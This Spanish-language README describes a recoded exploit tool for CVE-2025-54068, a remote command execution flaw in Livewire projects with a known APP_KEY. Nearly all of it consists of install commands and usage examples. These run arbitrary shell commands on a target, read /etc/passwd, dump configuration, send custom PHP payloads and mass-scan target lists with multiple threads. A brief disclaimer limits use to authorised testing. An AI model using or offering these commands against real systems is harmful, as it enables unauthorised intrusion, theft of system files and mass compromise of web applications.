
Una herramienta diseñada para explotar CVE-2025-54068 y la ejecución remota de comandos del proyecto Livewire.
Una herramienta diseñada para explotar CVE-2025-54068 y la ejecución remota de comandos si se conoce la APP_KEY del proyecto Livewire.
Esta herramienta es una versión recodificada del proyecto original de Synacktiv:
El concepto central y la metodología se basan en la implementación original. Esta versión incluye mejoras menores y características adicionales para mejorar la usabilidad y la flexibilidad.
Instala la herramienta usando pipx:
pipx install git+https://github.com/haxorstars/CVE-2025-54068
o usando uv:
uv tool install git+https://github.com/haxorstars/CVE-2025-54068
Ejecuta la herramienta contra un solo objetivo:
livewire-rce-2025 -u target.com
Con parámetros personalizados:
livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la"
Ejecuta funciones personalizadas predefinidas:
livewire-rce-2025 -u target.com --custom-function "shell:ls -la"
livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd"
livewire-rce-2025 -u target.com --custom-function "phpinfo"
livewire-rce-2025 -u target.com --custom-function "config"
Combina múltiples funciones en un solo comando:
livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"
Usa tu propio archivo de payload PHP:
livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id"
Genera el payload sin enviarlo al objetivo:
livewire-rce-2025 -generate-payload --custom-function "shell:ls -la"
O usando un archivo PHP personalizado:
livewire-rce-2025 -generate-payload --custom-file custom.php
Escanea múltiples objetivos desde un archivo:
livewire-rce-2025 -mass-check targets.txt -o results.json
Con un número personalizado de hilos:
livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json
Esta herramienta está destinada únicamente a fines educativos y de pruebas de seguridad autorizadas. No la uses contra sistemas que no poseas o para los que no tengas permiso explícito de probar.
Feliz hacking😄